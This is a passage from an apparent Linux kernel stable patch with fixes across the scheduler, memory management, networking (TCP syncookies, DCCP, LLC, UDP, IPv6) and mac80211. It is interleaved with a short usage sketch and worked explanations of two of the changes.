+-		if (prev_spare_cap > 0) {
++		if (prev_spare_cap > -1) {
+ 			prev_delta = compute_energy(&eenv, pd, cpus, p,
+ 						    prev_cpu);
+ 			/* CPU utilization has changed */
+@@ -10730,13 +10713,15 @@ more_balance:
+ 				busiest->push_cpu = this_cpu;
+ 				active_balance = 1;
+ 			}
+-			raw_spin_rq_unlock_irqrestore(busiest, flags);
+ 
++			preempt_disable();
++			raw_spin_rq_unlock_irqrestore(busiest, flags);
+ 			if (active_balance) {
+ 				stop_one_cpu_nowait(cpu_of(busiest),
+ 					active_load_balance_cpu_stop, busiest,
+ 					&busiest->active_balance_work);
+ 			}
++			preempt_enable();
+ 		}
+ 	} else {
+ 		sd->nr_balance_failed = 0;
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 576eb2f51f043..76bafa8d331a7 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -2109,9 +2109,11 @@ retry:
+ 		 */
+ 		push_task = get_push_task(rq);
+ 		if (push_task) {
++			preempt_disable();
+ 			raw_spin_rq_unlock(rq);
+ 			stop_one_cpu_nowait(rq->cpu, push_cpu_stop,
+ 					    push_task, &rq->push_work);
++			preempt_enable();
+ 			raw_spin_rq_lock(rq);
+ 		}
+ 
+@@ -2448,9 +2450,11 @@ skip:
+ 		double_unlock_balance(this_rq, src_rq);
+ 
+ 		if (push_task) {
++			preempt_disable();
+ 			raw_spin_rq_unlock(this_rq);
+ 			stop_one_cpu_nowait(src_rq->cpu, push_cpu_stop,
+ 					    push_task, &src_rq->push_work);
++			preempt_enable();
+ 			raw_spin_rq_lock(this_rq);
+ 		}
+ 	}
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index 56675294d7a3b..a34a4fcdab7b1 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -986,9 +986,9 @@ EXPORT_SYMBOL_GPL(kprobe_event_cmd_init);
+ /**
+  * __kprobe_event_gen_cmd_start - Generate a kprobe event command from arg list
+  * @cmd: A pointer to the dynevent_cmd struct representing the new event
++ * @kretprobe: Is this a return probe?
+  * @name: The name of the kprobe event
+  * @loc: The location of the kprobe event
+- * @kretprobe: Is this a return probe?
+  * @...: Variable number of arg (pairs), one pair for each field
+  *
+  * NOTE: Users normally won't want to call this function directly, but
+diff --git a/lib/kunit/executor.c b/lib/kunit/executor.c
+index 74982b83707ca..05ac4cdb6806a 100644
+--- a/lib/kunit/executor.c
++++ b/lib/kunit/executor.c
+@@ -102,8 +102,10 @@ static void kunit_free_suite_set(struct suite_set suite_set)
+ {
+ 	struct kunit_suite * const *suites;
+ 
+-	for (suites = suite_set.start; suites < suite_set.end; suites++)
++	for (suites = suite_set.start; suites < suite_set.end; suites++) {
++		kfree((*suites)->test_cases);
+ 		kfree(*suites);
++	}
+ 	kfree(suite_set.start);
+ }
+ 
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 322aea78058a0..2d930470aacaa 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -2262,6 +2262,60 @@ out:
+ }
+ EXPORT_SYMBOL(filemap_get_folios_contig);
+ 
++/**
++ * filemap_get_folios_tag - Get a batch of folios matching @tag
++ * @mapping:    The address_space to search
++ * @start:      The starting page index
++ * @end:        The final page index (inclusive)
++ * @tag:        The tag index
++ * @fbatch:     The batch to fill
++ *
++ * Same as filemap_get_folios(), but only returning folios tagged with @tag.
++ *
++ * Return: The number of folios found.
++ * Also update @start to index the next folio for traversal.
++ */
++unsigned filemap_get_folios_tag(struct address_space *mapping, pgoff_t *start,
++			pgoff_t end, xa_mark_t tag, struct folio_batch *fbatch)
++{
++	XA_STATE(xas, &mapping->i_pages, *start);
++	struct folio *folio;
++
++	rcu_read_lock();
++	while ((folio = find_get_entry(&xas, end, tag)) != NULL) {
++		/*
++		 * Shadow entries should never be tagged, but this iteration
++		 * is lockless so there is a window for page reclaim to evict
++		 * a page we saw tagged. Skip over it.
++		 */
++		if (xa_is_value(folio))
++			continue;
++		if (!folio_batch_add(fbatch, folio)) {
++			unsigned long nr = folio_nr_pages(folio);
++
++			if (folio_test_hugetlb(folio))
++				nr = 1;
++			*start = folio->index + nr;
++			goto out;
++		}
++	}
++	/*
++	 * We come here when there is no page beyond @end. We take care to not
++	 * overflow the index @start as it confuses some of the callers. This
++	 * breaks the iteration when there is a page at index -1 but that is
++	 * already broke anyway.
++	 */
++	if (end == (pgoff_t)-1)
++		*start = (pgoff_t)-1;
++	else
++		*start = end + 1;
++out:
++	rcu_read_unlock();
++
++	return folio_batch_count(fbatch);
++}
++EXPORT_SYMBOL(filemap_get_folios_tag);
++
+ /**
+  * find_get_pages_range_tag - Find and return head pages matching @tag.
+  * @mapping:	the address_space to search
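+
A hedged usage sketch for the helper added above, in the writeback-style loop it is designed for; the enclosing function and the per-folio processing are placeholders, while folio_batch_init(), folio_batch_release() and PAGECACHE_TAG_DIRTY are the existing kernel APIs it pairs with:

static void example_walk_dirty(struct address_space *mapping)
{
	struct folio_batch fbatch;
	pgoff_t index = 0;
	unsigned int i, nr;

	folio_batch_init(&fbatch);
	while ((nr = filemap_get_folios_tag(mapping, &index, (pgoff_t)-1,
					    PAGECACHE_TAG_DIRTY, &fbatch))) {
		for (i = 0; i < nr; i++) {
			struct folio *folio = fbatch.folios[i];
			/* write back @folio; @index already points
			 * past this batch for the next iteration */
		}
		folio_batch_release(&fbatch);
		cond_resched();
	}
}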
+diff --git a/mm/readahead.c b/mm/readahead.c
+index b10f0cf81d804..ba43428043a35 100644
+--- a/mm/readahead.c
++++ b/mm/readahead.c
+@@ -749,7 +749,8 @@ ssize_t ksys_readahead(int fd, loff_t offset, size_t count)
+ 	 */
+ 	ret = -EINVAL;
+ 	if (!f.file->f_mapping || !f.file->f_mapping->a_ops ||
+-	    !S_ISREG(file_inode(f.file)->i_mode))
++	    (!S_ISREG(file_inode(f.file)->i_mode) &&
++	    !S_ISBLK(file_inode(f.file)->i_mode)))
+ 		goto out;
+ 
+ 	ret = vfs_fadvise(f.file, offset, count, POSIX_FADV_WILLNEED);
+diff --git a/net/9p/client.c b/net/9p/client.c
+index af59c3f2ec2e7..a96e127ca4883 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -537,12 +537,14 @@ static int p9_check_errors(struct p9_client *c, struct p9_req_t *req)
+ 		return 0;
+ 
+ 	if (!p9_is_proto_dotl(c)) {
+-		char *ename;
++		char *ename = NULL;
+ 
+ 		err = p9pdu_readf(&req->rc, c->proto_version, "s?d",
+ 				  &ename, &ecode);
+-		if (err)
++		if (err) {
++			kfree(ename);
+ 			goto out_err;
++		}
+ 
+ 		if (p9_is_proto_dotu(c) && ecode < 512)
+ 			err = -ecode;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 5218c4dfe0a89..d74fe13f3dceb 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -151,7 +151,7 @@ struct sk_buff *__hci_cmd_sync_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 	struct sk_buff *skb;
+ 	int err = 0;
+ 
+-	bt_dev_dbg(hdev, "Opcode 0x%4x", opcode);
++	bt_dev_dbg(hdev, "Opcode 0x%4.4x", opcode);
+ 
+ 	hci_req_init(&req, hdev);
+ 
+@@ -247,7 +247,7 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 	skb = __hci_cmd_sync_sk(hdev, opcode, plen, param, event, timeout, sk);
+ 	if (IS_ERR(skb)) {
+ 		if (!event)
+-			bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
++			bt_dev_err(hdev, "Opcode 0x%4.4x failed: %ld", opcode,
+ 				   PTR_ERR(skb));
+ 		return PTR_ERR(skb);
+ 	}
+diff --git a/net/core/page_pool.c b/net/core/page_pool.c
+index 2396c99bedeaa..caf6d950d54ad 100644
+--- a/net/core/page_pool.c
++++ b/net/core/page_pool.c
+@@ -209,8 +209,12 @@ static int page_pool_init(struct page_pool *pool,
+ 		return -ENOMEM;
+ #endif
+ 
+-	if (ptr_ring_init(&pool->ring, ring_qsize, GFP_KERNEL) < 0)
++	if (ptr_ring_init(&pool->ring, ring_qsize, GFP_KERNEL) < 0) {
++#ifdef CONFIG_PAGE_POOL_STATS
++		free_percpu(pool->recycle_stats);
++#endif
+ 		return -ENOMEM;
++	}
+ 
+ 	atomic_set(&pool->pages_state_release_cnt, 0);
+ 
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 8dca4a7ca4a1f..73b1e0e53534e 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -3958,6 +3958,7 @@ static void skb_ts_finish(struct ts_config *conf, struct ts_state *state)
+ unsigned int skb_find_text(struct sk_buff *skb, unsigned int from,
+ 			   unsigned int to, struct ts_config *config)
+ {
++	unsigned int patlen = config->ops->get_pattern_len(config);
+ 	struct ts_state state;
+ 	unsigned int ret;
+ 
+@@ -3969,7 +3970,7 @@ unsigned int skb_find_text(struct sk_buff *skb, unsigned int from,
+ 	skb_prepare_seq_read(skb, from, to, TS_SKB_CB(&state));
+ 
+ 	ret = textsearch_find(config, &state);
+-	return (ret <= to - from ? ret : UINT_MAX);
++	return (ret + patlen <= to - from ? ret : UINT_MAX);
+ }
+ EXPORT_SYMBOL(skb_find_text);
+ 
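The skb_find_text() change accounts for the pattern length: a hit only counts when the whole pattern, not just its first byte, lies inside the [from, to) window. A standalone restatement of the corrected bound with a worked example (names are illustrative):

#include <stdbool.h>
#include <stdint.h>

/* A match starting at offset 'ret' (relative to 'from') is valid
 * only if it also ends inside the window. */
static bool match_in_window(uint32_t ret, uint32_t patlen,
			    uint32_t from, uint32_t to)
{
	return ret + patlen <= to - from;
}

/* Example: window of 10 bytes (from = 0, to = 10), patlen = 4,
 * ret = 8: the old "ret <= to - from" test passed (8 <= 10), the
 * new test fails (8 + 4 > 10) since the match ends at byte 12. */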
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index 247179d4c8865..9fe6d96797169 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -628,9 +628,6 @@ int dccp_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_parse_options(sk, dreq, skb))
+ 		goto drop_and_free;
+ 
+-	if (security_inet_conn_request(sk, skb, req))
+-		goto drop_and_free;
+-
+ 	ireq = inet_rsk(req);
+ 	sk_rcv_saddr_set(req_to_sk(req), ip_hdr(skb)->daddr);
+ 	sk_daddr_set(req_to_sk(req), ip_hdr(skb)->saddr);
+@@ -638,6 +635,9 @@ int dccp_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	ireq->ireq_family = AF_INET;
+ 	ireq->ir_iif = READ_ONCE(sk->sk_bound_dev_if);
+ 
++	if (security_inet_conn_request(sk, skb, req))
++		goto drop_and_free;
++
+ 	/*
+ 	 * Step 3: Process LISTEN state
+ 	 *
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 6fb34eaf1237a..e0b0bf75a46c2 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -359,15 +359,15 @@ static int dccp_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_parse_options(sk, dreq, skb))
+ 		goto drop_and_free;
+ 
+-	if (security_inet_conn_request(sk, skb, req))
+-		goto drop_and_free;
+-
+ 	ireq = inet_rsk(req);
+ 	ireq->ir_v6_rmt_addr = ipv6_hdr(skb)->saddr;
+ 	ireq->ir_v6_loc_addr = ipv6_hdr(skb)->daddr;
+ 	ireq->ireq_family = AF_INET6;
+ 	ireq->ir_mark = inet_request_mark(sk, skb);
+ 
++	if (security_inet_conn_request(sk, skb, req))
++		goto drop_and_free;
++
+ 	if (ipv6_opt_accepted(sk, skb, IP6CB(skb)) ||
+ 	    np->rxopt.bits.rxinfo || np->rxopt.bits.rxoinfo ||
+ 	    np->rxopt.bits.rxhlim || np->rxopt.bits.rxohlim) {
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index b71dab630a873..80cdc6f6b34c9 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -342,9 +342,7 @@ struct sk_buff *prp_create_tagged_frame(struct hsr_frame_info *frame,
+ 	skb = skb_copy_expand(frame->skb_std, 0,
+ 			      skb_tailroom(frame->skb_std) + HSR_HLEN,
+ 			      GFP_ATOMIC);
+-	prp_fill_rct(skb, frame, port);
+-
+-	return skb;
++	return prp_fill_rct(skb, frame, port);
+ }
+ 
+ static void hsr_deliver_master(struct sk_buff *skb, struct net_device *dev,
+diff --git a/net/ipv4/syncookies.c b/net/ipv4/syncookies.c
+index 26fb97d1d4d9a..f9514cf87649e 100644
+--- a/net/ipv4/syncookies.c
++++ b/net/ipv4/syncookies.c
+@@ -41,7 +41,6 @@ static siphash_aligned_key_t syncookie_secret[2];
+  * requested/supported by the syn/synack exchange.
+  */
+ #define TSBITS	6
+-#define TSMASK	(((__u32)1 << TSBITS) - 1)
+ 
+ static u32 cookie_hash(__be32 saddr, __be32 daddr, __be16 sport, __be16 dport,
+ 		       u32 count, int c)
+@@ -62,27 +61,22 @@ static u32 cookie_hash(__be32 saddr, __be32 daddr, __be16 sport, __be16 dport,
+  */
+ u64 cookie_init_timestamp(struct request_sock *req, u64 now)
+ {
+-	struct inet_request_sock *ireq;
+-	u32 ts, ts_now = tcp_ns_to_ts(now);
++	const struct inet_request_sock *ireq = inet_rsk(req);
++	u64 ts, ts_now = tcp_ns_to_ts(now);
+ 	u32 options = 0;
+ 
+-	ireq = inet_rsk(req);
+-
+ 	options = ireq->wscale_ok ? ireq->snd_wscale : TS_OPT_WSCALE_MASK;
+ 	if (ireq->sack_ok)
+ 		options |= TS_OPT_SACK;
+ 	if (ireq->ecn_ok)
+ 		options |= TS_OPT_ECN;
+ 
+-	ts = ts_now & ~TSMASK;
++	ts = (ts_now >> TSBITS) << TSBITS;
+ 	ts |= options;
+-	if (ts > ts_now) {
+-		ts >>= TSBITS;
+-		ts--;
+-		ts <<= TSBITS;
+-		ts |= options;
+-	}
+-	return (u64)ts * (NSEC_PER_SEC / TCP_TS_HZ);
++	if (ts > ts_now)
++		ts -= (1UL << TSBITS);
++
++	return ts * (NSEC_PER_SEC / TCP_TS_HZ);
+ }
+ 
+ 
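The rewritten cookie_init_timestamp() is easier to follow with numbers: the low TSBITS bits of the current TSval are replaced by the option bits, and if that OR pushes the value into the future, one full 2^TSBITS step is subtracted so the cookie timestamp never exceeds "now". A small standalone demonstration (assumed userspace, not kernel code):

#include <stdint.h>
#include <stdio.h>

#define TSBITS 6

static uint64_t cookie_ts(uint64_t ts_now, uint32_t options)
{
	uint64_t ts = (ts_now >> TSBITS) << TSBITS;	/* clear low bits */

	ts |= options;
	if (ts > ts_now)
		ts -= 1ULL << TSBITS;	/* step back into the past */
	return ts;
}

int main(void)
{
	/* ts_now = 130, options = 5: 128 | 5 = 133 > 130, so 133 - 64 = 69 */
	printf("%llu\n", (unsigned long long)cookie_ts(130, 5));
	return 0;
}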
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index d63942202493d..65dae3d43684f 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -6420,22 +6420,23 @@ reset_and_undo:
+ 
+ static void tcp_rcv_synrecv_state_fastopen(struct sock *sk)
+ {
++	struct tcp_sock *tp = tcp_sk(sk);
+ 	struct request_sock *req;
+ 
+ 	/* If we are still handling the SYNACK RTO, see if timestamp ECR allows
+ 	 * undo. If peer SACKs triggered fast recovery, we can't undo here.
+ 	 */
+-	if (inet_csk(sk)->icsk_ca_state == TCP_CA_Loss)
+-		tcp_try_undo_loss(sk, false);
++	if (inet_csk(sk)->icsk_ca_state == TCP_CA_Loss && !tp->packets_out)
++		tcp_try_undo_recovery(sk);
+ 
+ 	/* Reset rtx states to prevent spurious retransmits_timed_out() */
+-	tcp_sk(sk)->retrans_stamp = 0;
++	tp->retrans_stamp = 0;
+ 	inet_csk(sk)->icsk_retransmits = 0;
+ 
+ 	/* Once we leave TCP_SYN_RECV or TCP_FIN_WAIT_1,
+ 	 * we no longer need req so release it.
+ 	 */
+-	req = rcu_dereference_protected(tcp_sk(sk)->fastopen_rsk,
++	req = rcu_dereference_protected(tp->fastopen_rsk,
+ 					lockdep_sock_is_held(sk));
+ 	reqsk_fastopen_remove(sk, req, false);
+ 
+diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
+index 99ac5efe244d3..a7364ff8b558d 100644
+--- a/net/ipv4/tcp_metrics.c
++++ b/net/ipv4/tcp_metrics.c
+@@ -470,11 +470,15 @@ void tcp_init_metrics(struct sock *sk)
+ 	u32 val, crtt = 0; /* cached RTT scaled by 8 */
+ 
+ 	sk_dst_confirm(sk);
++	/* ssthresh may have been reduced unnecessarily during
++	 * 3WHS. Restore it to its initial default.
++	 */
++	tp->snd_ssthresh = TCP_INFINITE_SSTHRESH;
+ 	if (!dst)
+ 		goto reset;
+ 
+ 	rcu_read_lock();
+-	tm = tcp_get_metrics(sk, dst, true);
++	tm = tcp_get_metrics(sk, dst, false);
+ 	if (!tm) {
+ 		rcu_read_unlock();
+ 		goto reset;
+@@ -489,11 +493,6 @@ void tcp_init_metrics(struct sock *sk)
+ 		tp->snd_ssthresh = val;
+ 		if (tp->snd_ssthresh > tp->snd_cwnd_clamp)
+ 			tp->snd_ssthresh = tp->snd_cwnd_clamp;
+-	} else {
+-		/* ssthresh may have been reduced unnecessarily during.
+-		 * 3WHS. Restore it back to its initial default.
+-		 */
+-		tp->snd_ssthresh = TCP_INFINITE_SSTHRESH;
+ 	}
+ 	val = tcp_metric_get(tm, TCP_METRIC_REORDERING);
+ 	if (val && tp->reordering != val)
+@@ -908,7 +907,7 @@ static void tcp_metrics_flush_all(struct net *net)
+ 			match = net ? net_eq(tm_net(tm), net) :
+ 				!refcount_read(&tm_net(tm)->ns.count);
+ 			if (match) {
+-				*pp = tm->tcpm_next;
++				rcu_assign_pointer(*pp, tm->tcpm_next);
+ 				kfree_rcu(tm, rcu_head);
+ 			} else {
+ 				pp = &tm->tcpm_next;
+@@ -949,7 +948,7 @@ static int tcp_metrics_nl_cmd_del(struct sk_buff *skb, struct genl_info *info)
+ 		if (addr_same(&tm->tcpm_daddr, &daddr) &&
+ 		    (!src || addr_same(&tm->tcpm_saddr, &saddr)) &&
+ 		    net_eq(tm_net(tm), net)) {
+-			*pp = tm->tcpm_next;
++			rcu_assign_pointer(*pp, tm->tcpm_next);
+ 			kfree_rcu(tm, rcu_head);
+ 			found = true;
+ 		} else {
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index b2aa7777521f6..65abc92a81bd0 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -2714,10 +2714,12 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 		case UDP_ENCAP_ESPINUDP_NON_IKE:
+ #if IS_ENABLED(CONFIG_IPV6)
+ 			if (sk->sk_family == AF_INET6)
+-				up->encap_rcv = ipv6_stub->xfrm6_udp_encap_rcv;
++				WRITE_ONCE(up->encap_rcv,
++					   ipv6_stub->xfrm6_udp_encap_rcv);
+ 			else
+ #endif
+-				up->encap_rcv = xfrm4_udp_encap_rcv;
++				WRITE_ONCE(up->encap_rcv,
++					   xfrm4_udp_encap_rcv);
+ #endif
+ 			fallthrough;
+ 		case UDP_ENCAP_L2TPINUDP:
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index ce2c5e728745f..3c2b2a85de367 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -161,7 +161,13 @@ ip6_finish_output_gso_slowpath_drop(struct net *net, struct sock *sk,
+ 		int err;
+ 
+ 		skb_mark_not_on_list(segs);
+-		err = ip6_fragment(net, sk, segs, ip6_finish_output2);
++		/* Last GSO segment can be smaller than gso_size (and MTU).
++		 * Adding a fragment header would produce an "atomic fragment",
++		 * which is considered harmful (RFC-8021). Avoid that.
++		 */
++		err = segs->len > mtu ?
++			ip6_fragment(net, sk, segs, ip6_finish_output2) :
++			ip6_finish_output2(net, sk, segs);
+ 		if (err && ret == 0)
+ 			ret = err;
+ 	}
+diff --git a/net/ipv6/syncookies.c b/net/ipv6/syncookies.c
+index 5014aa6634527..8698b49dfc8de 100644
+--- a/net/ipv6/syncookies.c
++++ b/net/ipv6/syncookies.c
+@@ -180,14 +180,15 @@ struct sock *cookie_v6_check(struct sock *sk, struct sk_buff *skb)
+ 	treq = tcp_rsk(req);
+ 	treq->tfo_listener = false;
+ 
+-	if (security_inet_conn_request(sk, skb, req))
+-		goto out_free;
+-
+ 	req->mss = mss;
+ 	ireq->ir_rmt_port = th->source;
+ 	ireq->ir_num = ntohs(th->dest);
+ 	ireq->ir_v6_rmt_addr = ipv6_hdr(skb)->saddr;
+ 	ireq->ir_v6_loc_addr = ipv6_hdr(skb)->daddr;
++
++	if (security_inet_conn_request(sk, skb, req))
++		goto out_free;
++
+ 	if (ipv6_opt_accepted(sk, skb, &TCP_SKB_CB(skb)->header.h6) ||
+ 	    np->rxopt.bits.rxinfo || np->rxopt.bits.rxoinfo ||
+ 	    np->rxopt.bits.rxhlim || np->rxopt.bits.rxohlim) {
+diff --git a/net/llc/llc_input.c b/net/llc/llc_input.c
+index 7cac441862e21..51bccfb00a9cd 100644
+--- a/net/llc/llc_input.c
++++ b/net/llc/llc_input.c
+@@ -127,8 +127,14 @@ static inline int llc_fixup_skb(struct sk_buff *skb)
+ 	skb->transport_header += llc_len;
+ 	skb_pull(skb, llc_len);
+ 	if (skb->protocol == htons(ETH_P_802_2)) {
+-		__be16 pdulen = eth_hdr(skb)->h_proto;
+-		s32 data_size = ntohs(pdulen) - llc_len;
++		__be16 pdulen;
++		s32 data_size;
++
++		if (skb->mac_len < ETH_HLEN)
++			return 0;
++
++		pdulen = eth_hdr(skb)->h_proto;
++		data_size = ntohs(pdulen) - llc_len;
+ 
+ 		if (data_size < 0 ||
+ 		    !pskb_may_pull(skb, data_size))
+diff --git a/net/llc/llc_s_ac.c b/net/llc/llc_s_ac.c
+index 79d1cef8f15a9..06fb8e6944b06 100644
+--- a/net/llc/llc_s_ac.c
++++ b/net/llc/llc_s_ac.c
+@@ -153,6 +153,9 @@ int llc_sap_action_send_test_r(struct llc_sap *sap, struct sk_buff *skb)
+ 	int rc = 1;
+ 	u32 data_size;
+ 
++	if (skb->mac_len < ETH_HLEN)
++		return 1;
++
+ 	llc_pdu_decode_sa(skb, mac_da);
+ 	llc_pdu_decode_da(skb, mac_sa);
+ 	llc_pdu_decode_ssap(skb, &dsap);
+diff --git a/net/llc/llc_station.c b/net/llc/llc_station.c
+index 05c6ae0920534..f506542925109 100644
+--- a/net/llc/llc_station.c
++++ b/net/llc/llc_station.c
+@@ -76,6 +76,9 @@ static int llc_station_ac_send_test_r(struct sk_buff *skb)
+ 	u32 data_size;
+ 	struct sk_buff *nskb;
+ 
++	if (skb->mac_len < ETH_HLEN)
++		goto out;
++
+ 	/* The test request command is type U (llc_len = 3) */
+ 	data_size = ntohs(eth_hdr(skb)->h_proto) - 3;
+ 	nskb = llc_alloc_frame(NULL, skb->dev, LLC_PDU_TYPE_U, data_size);
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 99a976ea17498..d5dd2d9e89b48 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1361,7 +1361,7 @@ struct ieee80211_local {
+ 	/* wowlan is enabled -- don't reconfig on resume */
+ 	bool wowlan;
+ 
+-	struct work_struct radar_detected_work;
++	struct wiphy_work radar_detected_work;
+ 
+ 	/* number of RX chains the hardware has */
+ 	u8 rx_chains;
+@@ -1438,14 +1438,14 @@ struct ieee80211_local {
+ 	int hw_scan_ies_bufsize;
+ 	struct cfg80211_scan_info scan_info;
+ 
+-	struct work_struct sched_scan_stopped_work;
++	struct wiphy_work sched_scan_stopped_work;
+ 	struct ieee80211_sub_if_data __rcu *sched_scan_sdata;
+ 	struct cfg80211_sched_scan_request __rcu *sched_scan_req;
+ 	u8 scan_addr[ETH_ALEN];
+ 
+ 	unsigned long leave_oper_channel_time;
+ 	enum mac80211_scan_state next_scan_state;
+-	struct delayed_work scan_work;
++	struct wiphy_delayed_work scan_work;
+ 	struct ieee80211_sub_if_data __rcu *scan_sdata;
+ 	/* For backward compatibility only -- do not use */
+ 	struct cfg80211_chan_def _oper_chandef;
+@@ -1538,9 +1538,9 @@ struct ieee80211_local {
+ 	/*
+ 	 * Remain-on-channel support
+ 	 */
+-	struct delayed_work roc_work;
++	struct wiphy_delayed_work roc_work;
+ 	struct list_head roc_list;
+-	struct work_struct hw_roc_start, hw_roc_done;
++	struct wiphy_work hw_roc_start, hw_roc_done;
+ 	unsigned long hw_roc_start_time;
+ 	u64 roc_cookie_counter;
+ 
+@@ -1862,7 +1862,7 @@ int ieee80211_mesh_csa_beacon(struct ieee80211_sub_if_data *sdata,
+ int ieee80211_mesh_finish_csa(struct ieee80211_sub_if_data *sdata);
+ 
+ /* scan/BSS handling */
+-void ieee80211_scan_work(struct work_struct *work);
++void ieee80211_scan_work(struct wiphy *wiphy, struct wiphy_work *work);
+ int ieee80211_request_ibss_scan(struct ieee80211_sub_if_data *sdata,
+ 				const u8 *ssid, u8 ssid_len,
+ 				struct ieee80211_channel **channels,
+@@ -1892,7 +1892,8 @@ int ieee80211_request_sched_scan_start(struct ieee80211_sub_if_data *sdata,
+ 				       struct cfg80211_sched_scan_request *req);
+ int ieee80211_request_sched_scan_stop(struct ieee80211_local *local);
+ void ieee80211_sched_scan_end(struct ieee80211_local *local);
+-void ieee80211_sched_scan_stopped_work(struct work_struct *work);
++void ieee80211_sched_scan_stopped_work(struct wiphy *wiphy,
++				       struct wiphy_work *work);
+ 
+ /* off-channel/mgmt-tx */
+ void ieee80211_offchannel_stop_vifs(struct ieee80211_local *local);
+@@ -2483,7 +2484,8 @@ bool ieee80211_is_radar_required(struct ieee80211_local *local);
+ void ieee80211_dfs_cac_timer(unsigned long data);
+ void ieee80211_dfs_cac_timer_work(struct work_struct *work);
+ void ieee80211_dfs_cac_cancel(struct ieee80211_local *local);
+-void ieee80211_dfs_radar_detected_work(struct work_struct *work);
++void ieee80211_dfs_radar_detected_work(struct wiphy *wiphy,
++				       struct wiphy_work *work);
+ int ieee80211_send_action_csa(struct ieee80211_sub_if_data *sdata,
+ 			      struct cfg80211_csa_settings *csa_settings);
+ 
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index 8dd3c10a99e0b..e00e1bf0f754a 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -697,7 +697,7 @@ static void ieee80211_do_stop(struct ieee80211_sub_if_data *sdata, bool going_do
+ 	ieee80211_recalc_ps(local);
+ 
+ 	if (cancel_scan)
+-		flush_delayed_work(&local->scan_work);
++		wiphy_delayed_work_flush(local->hw.wiphy, &local->scan_work);
+ 
+ 	if (local->open_count == 0) {
+ 		ieee80211_stop_device(local);
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 02b5abc7326bc..6faba47b7b0ea 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -334,10 +334,7 @@ static void ieee80211_restart_work(struct work_struct *work)
+ 	struct ieee80211_sub_if_data *sdata;
+ 	int ret;
+ 
+-	/* wait for scan work complete */
+ 	flush_workqueue(local->workqueue);
+-	flush_work(&local->sched_scan_stopped_work);
+-	flush_work(&local->radar_detected_work);
+ 
+ 	rtnl_lock();
+ 	/* we might do interface manipulations, so need both */
+@@ -377,8 +374,8 @@ static void ieee80211_restart_work(struct work_struct *work)
+ 	ieee80211_scan_cancel(local);
+ 
+ 	/* make sure any new ROC will consider local->in_reconfig */
+-	flush_delayed_work(&local->roc_work);
+-	flush_work(&local->hw_roc_done);
++	wiphy_delayed_work_flush(local->hw.wiphy, &local->roc_work);
++	wiphy_work_flush(local->hw.wiphy, &local->hw_roc_done);
+ 
+ 	/* wait for all packet processing to be done */
+ 	synchronize_net();
+@@ -807,12 +804,12 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 	INIT_LIST_HEAD(&local->chanctx_list);
+ 	mutex_init(&local->chanctx_mtx);
+ 
+-	INIT_DELAYED_WORK(&local->scan_work, ieee80211_scan_work);
++	wiphy_delayed_work_init(&local->scan_work, ieee80211_scan_work);
+ 
+ 	INIT_WORK(&local->restart_work, ieee80211_restart_work);
+ 
+-	INIT_WORK(&local->radar_detected_work,
+-		  ieee80211_dfs_radar_detected_work);
++	wiphy_work_init(&local->radar_detected_work,
++			ieee80211_dfs_radar_detected_work);
+ 
+ 	INIT_WORK(&local->reconfig_filter, ieee80211_reconfig_filter);
+ 	local->smps_mode = IEEE80211_SMPS_OFF;
+@@ -823,8 +820,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 		  ieee80211_dynamic_ps_disable_work);
+ 	timer_setup(&local->dynamic_ps_timer, ieee80211_dynamic_ps_timer, 0);
+ 
+-	INIT_WORK(&local->sched_scan_stopped_work,
+-		  ieee80211_sched_scan_stopped_work);
++	wiphy_work_init(&local->sched_scan_stopped_work,
++			ieee80211_sched_scan_stopped_work);
+ 
+ 	spin_lock_init(&local->ack_status_lock);
+ 	idr_init(&local->ack_status_frames);
+@@ -1471,13 +1468,15 @@ void ieee80211_unregister_hw(struct ieee80211_hw *hw)
+ 	 */
